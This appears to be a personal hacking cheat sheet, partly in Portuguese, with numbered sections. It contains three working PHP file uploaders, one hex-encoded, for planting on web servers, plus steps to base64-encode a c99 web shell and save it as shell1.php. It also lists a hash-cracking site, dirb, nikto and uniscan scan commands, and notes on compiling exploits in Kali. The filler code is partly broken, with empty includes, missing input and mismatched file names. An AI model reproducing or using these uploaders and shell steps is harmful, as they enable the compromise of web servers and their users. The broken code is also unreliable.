Decriptografando senhas "fracas" - Decrypting weak passwords.

The longer and the more characters mixed in the password the most difficult
will be to decrypt it.


http://www.hashkiller.co.uk/md5-decrypter.aspx


Site para decriptografar  hashes / senhas:

202cb962ac59075b964b07152d234b70







14 - Uploaders


Uploader 1

<?php
echo '<b><br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
    if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }
    else { echo '<b>Upload !!!</b><br><br>'; }
}
?>

Uploader 2

<html>
<body><?phpif(!empty($_FILES["file"]["name"])){move_uploaded_file($_FILES["file"]["tmp_name"],$_FILES["file"]["name"]);}?>
<form action="#" method="post"enctype="multipart/form-data"><label for="file">Filename:</label><input type="file" name="file" id="file"><br>
<input type="submit" name="submit" value="Submit"></form></body>
</html>


Uploader 3 - Hexed

0x3c68746d6c3e3c626f64793e3c3f70687069662821656d70747928245f46494c45535b2266696c65225
d5b226e616d65225d29297b6d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c
65225d5b22746d705f6e616d65225d2c245f46494c45535b2266696c65225d5b226e616d65225d293b7d3
f3e3c666f726d20616374696f6e3d222322206d6574686f643d22706f737422656e63747970653d226d75
6c7469706172742f666f726d2d64617461223e3c6c6162656c20666f723d2266696c65223e46696c656e6
16d653a3c2f6c6162656c3e3c696e70757420747970653d2266696c6522206e616d653d2266696c652220
69643d2266696c65223e3c62723e3c696e70757420747970653d227375626d697422206e616d653d22737
5626d6974222076616c75653d225375626d6974223e3c2f666f726d3e3c2f626f64793e3c2f68746d6c3e

15 - dirb


 dirb http://www.site.com.br 

16 - Nikto


 nikto -h www.site.com.br -p 80,88,443 

17 - Uniscan


 uniscan -u http://site.com.br/ -qd 

18 - Compling C


Compiling exploit in Kali

 gcc -m32 -o output32 hello.c  ( 32 bit)

 gcc -m64 -o output hello.c    ( 64 bit)


More information.

http://www.tutorialspoint.com/cplusplus/
http://www.cprogramming.com/tutorial/lesson1.html
http://www3.ntu.edu.sg/home/ehchua/programming/cpp/cp1_Basics.html

Criating a simple c file.

 cat > hi.c 

#include 
int main()
{
system("color 09");
a:printf("Hello Friend,  How You? \n");
{
goto a;
}
getch();
}


Compiling.

 gcc hi.c -o hello2 

 chmod 777 hello2 


Running.

 ./hello 

19 - Compiling Perl


 

 cat > hello.pl 

#!usr/bin/perl
print "Enter your name: ";
$name=;
print "Hello, ${name} ... you will soon be a Perl addict!";

Running

 perl hello.pl 

20 - Compiling Python




Example 1

 cat > p1.py 

#!/usr/bin/python
print "Hello World!"
print "This is fun."

Running.

 python exe1.py 



Example 2

 cat > p2.py  

#!/usr/bin/python
name = raw_input('What is your name?\n')
print 'Hi, %s.' % name

Running.

 python exe2.py 


21 - Shell Base64 Encoding



http://www.localroot.net/

or

http://www.r57.gen.tr/

Choose shell c99



Colar no link abaixo e "encode", vai encodar em base64 gigante ...

http://www.freeformatter.com/base64-encoder.html


Clique ENCODE para gerar um codigo encriptografado gigante…

LyoqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKi
oqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKi8NCi8qDQovKiAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAjICAgICMgICAgICAgICMgICAgIyAgICAgICAgICAgICAgICAgICAgICAgIC
AgICAgDQovKiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAjICAgIyAgICAgICAgICAjICAg
Iw0KLyogICAgICAgI
:
:

Criando arquivo "shell1.php" e colar o codigo em base64 para dentro deste.

 nano shell1.php 



22 - zip, rar, tar.gz, bz2, tar, bz2


Descompactar arquivos

zip     	: gunzip    nome_do_arquivo.zip       ( unzip nome_do_arquivo.zip )

rar     	: unrar x   nome_do_arquivo.rar

tar     	: tar -xvf  nome_do_arquivo.tar

tar.gz      : tar -vzxf nome_do_arquivo.tar.gz

bz2     	: bunzip    nome_do_arquivo.bz2

tar.bz2     : tar -jxvf nome_do_arquivo.tar.bz2

23 - 10 minute e-mail


http://10minutemail.com/10MinuteMail/index.html




24 - Encryt x Decrypt Text


Digite uma senha com até 5 caracteres:


Digite texto a ser codificado / mostra texto decodificado:


Mostra texto codificado:


  



"Wisdom is like a river, the deeper it is the less noise it makes"

Afim de aprender mais? Fale comigo: linux1.noip@gmail.com